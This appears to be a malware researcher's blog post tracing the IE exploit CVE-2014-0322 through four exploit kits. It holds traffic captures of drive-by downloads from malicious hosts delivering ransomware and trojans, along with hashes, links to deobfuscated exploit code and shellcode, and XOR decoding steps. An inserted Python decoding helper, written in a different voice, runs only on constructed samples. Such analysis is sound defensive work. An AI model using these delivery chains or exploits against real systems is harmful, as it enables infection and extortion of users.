It took more time than I thought, but here we are: CVE-2014-0322 is now in Exploit Kits. It seems to have landed first in
Infinity EK:
Thanks to Timo Hirvonen for fixing my ugly approach to that one.
Successful pass in Win7 with Flash, before KB2925418, 2014-03-24
GET http://saarbangers-metal-festival .de/201403/br/573133020.htm
200 OK (text/html)
Piece of the encoded CVE-2014-0322 code and the call for the helper: http://pastebin.com/4dYArqEH
CVE-2014-0322 after deobfuscation: http://pastebin.com/VzHCR56A
GET http://saarbangers-metal-festival .de/swf.swf
200 OK (application/x-shockwave-flash) e8693573caecf1cab91aa578e1d62ab0 SWF helper
GET http://saarbangers-metal-festival .de/6084.swf
200 OK (application/x-shockwave-flash) CVE-2013-0634
GET http://saarbangers-metal-festival .de/6084.swf
200 OK (application/x-shockwave-flash)
GET http://saarbangers-metal-festival .de/9073.mp3?rnd=75091
200 OK (application/x-msdownload)
GET http://saarbangers-metal-festival .de/9073.mp3?rnd=60183
200 OK (application/x-msdownload)
Files: 2 Fiddler captures (OwnCloud)
You'll find a pcap too on the nice Traffic Malware Analysis.
Fiesta:
2014-03-25 - Thanks to EKWatcher for the referer. Fiesta: successful pass in Win7 IE10 with Flash, before KB2925418, 2014-03-25
GET http://bgpjterlrw.no-ip .info/mycxql2/counter.php?id=2
301 Redirect to http://bgpjterlrw.no-ip.info/mycxql2/?2
GET http://bgpjterlrw.no-ip .info/mycxql2/?2
200 OK (text/html) http://pastebin.com/mxWFtG83
GET http://bgpjterlrw.no-ip .info/mycxql2/?1723d0e41c0f5f6458545f08560b54050501050b5f0407040a0201005509060705
200 OK (text/html) http://pastebin.com/znN5J1nU <- CVE-2014-0322
Partial decoding of the components used to exploit CVE-2014-0322:
"Ladyr", once deobfuscated: http://pastebin.com/qVafD361
"Felt" shellcode: http://pastebin.com/w22nNLg8
Following EKWatcher's guidelines:
Base64 decode the "Felt" parameter
Piece of the Base64-decoded "Felt" parameter
In diStorm
or send the output to the online disassembler (thanks Ben Layer): http://www.onlinedisassembler.com/odaweb/CIUwSY
Base64-decoded shellcode in the online disassembler
XOR 0x20 on the Base64-decoded "Felt" parameter
GET http://bgpjterlrw.no-ip .info/mycxql2/?533de2b2f35a74c55c50555f570953030105045c5e0600020e060057540b010102
200 OK (application/x-shockwave-flash) 881a4d9fd2902e0af4e4a06bbc6ba63a <- Flash Helper
GET http://bgpjterlrw.no-ip .info/mycxql2/?1f210081f3d41f5b5216590a020b0900055005090b045a010a53010201095b0206;7
200 OK (application/octet-stream) - 98f29794b29c7a90cfc6af778a3d503c Redyms/Ramdo
Files: Fiddler
FlashPack:
Successful CVE-2014-0322 pass in FlashPack: 2014-03-27
GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/allow.php
200 OK (text/html)
GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/js/pd.php?id=68656c6c6f303332322e636f6d
200 OK (text/html)
POST http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/get_json.php
200 OK (text/html)
GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/msie.php
200 OK (text/html) <-- CVE-2013-2551
GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/link2jpg/index.php
200 OK (text/html)
http://pastebin.com/BxhPytN3
Code targeting CVE-2014-0322 in FlashPack: http://pastebin.com/SKSQBwB7
200 OK (application/x-shockwave-flash) Flash Helper: f9e1338083a03d1b965ce8502c109372
GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/link2jpg/Erido.jpg
200 OK (image/jpeg)
Same file name and XOR key (95) as when this 0day was first spotted live.
Erido.jpg after the XOR 95 pass.
Dropped in %temp%\low
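The two decoding steps above (Fiesta's "Felt" parameter: Base64 then XOR 0x20; FlashPack's Erido.jpg: XOR 95) are the same single-byte XOR unwrapping. This added analyst helper (my own example, not code from the post or from any kit) applies both, and also brute-forces an unknown single-byte key by looking for a PE header, which is how you confirm the key when a kit rotates it. The sample inputs are constructed here and are not real payloads.

```python
import base64
from typing import Optional

def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply one single-byte XOR key to every byte (0x20 for Fiesta's Felt, 95 for FlashPack's Erido.jpg)."""
    return bytes(b ^ key for b in data)

def decode_felt(felt_b64: str, key: int = 0x20) -> bytes:
    """Fiesta 'Felt' parameter: Base64 decode, then XOR each byte with 0x20 to get the raw shellcode."""
    return xor_bytes(base64.b64decode(felt_b64), key)

def looks_like_pe(data: bytes) -> bool:
    """Minimal PE sanity check: 'MZ' DOS magic and 'PE\\0\\0' at the e_lfanew offset."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def recover_xor_key(blob: bytes) -> Optional[int]:
    """Try all 256 single-byte keys; return the one that turns the blob into something with a PE header."""
    for key in range(256):
        if looks_like_pe(xor_bytes(blob, key)):
            return key
    return None

# Constructed sample (NOT a real binary): a bare DOS header pointing at a PE signature at 0x40,
# XORed with 95 the way FlashPack disguised Erido.jpg as an image.
_fake_pe = b"MZ" + b"\x00" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\x00" * 16
ERIDO_JPG_SAMPLE = xor_bytes(_fake_pe, 95)

# Constructed sample Felt-style parameter: Base64 of placeholder bytes XORed with 0x20.
_placeholder_shellcode = b"\x90\x90\xcc\xcc"
FELT_SAMPLE = base64.b64encode(xor_bytes(_placeholder_shellcode, 0x20)).decode()

if __name__ == "__main__":
    key = recover_xor_key(ERIDO_JPG_SAMPLE)
    print("recovered key:", key, "PE after decode:", looks_like_pe(xor_bytes(ERIDO_JPG_SAMPLE, key)))
    print("Felt shellcode bytes:", decode_felt(FELT_SAMPLE).hex())
```

On a real capture, feed recover_xor_key the bytes of the "jpg" response and decode_felt the value of the Felt parameter; a None key means the payload is not a plain single-byte XOR of a PE.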
kilensis.com /terkas/audio/loadmsie10.php
176.102.37.5543918 | 176.102.32.0/19 | IPSYSTEMS | UA | IPSYSTEMS.COM.UA | TK IPSYSTEMS LTD.
and here is the second file:
Files: Fiddler and samples (OwnCloud)
Angler EK:
Successful pass for CVE-2014-0322 in Angler EK 2014-03-28
200 OK (text/html)
Piece of the code targeting CVE-2014-0322 in Angler EK 2014-03-28: http://pastebin.com/PqrdhTnK
Why waste time renaming functions?
GET http://callositfrenavisseque.teampac12 .com/2ZhNTwSvCb7q0rUMk1eeQBch4k8SW3YuQb72x92634nu21RH
200 OK (text/html) 7aeefe2f40d607df2c51b89f912d9b37
GET http://callositfrenavisseque.teampac12 .com/QNZhV37gKdfsOwXFL86KIlYIKGhDK4PXmb55GtwVhjzPf-HP
200 OK (application/octet-stream) 0d62ee4c2fe169a65cd2d9afde80b6bc (Reveton Ransomware)
Files: Landing, SWF, encoded and decoded payload (see here for decoding)
Note: I know it's in Styx (see this: http://pastebin.com/Ya8kZihy ).
This is the Styx from the guys who were pushing Kovter and ZeroAccess in Sakura till December 2013 and then switched to Styx. But I do not have a referer. Would love feedback on this.
Last known (to me) position:
Read More:
Emerging Threat: MS IE 10 Zero-Day (CVE-2014-0322) Use-After-Free Remote Code Execution Vulnerability - 2014-02-19 - Symantec
New Internet Explorer 10 Zero-Day Discovered in Watering Hole Attack - 2014-02-14 - Symantec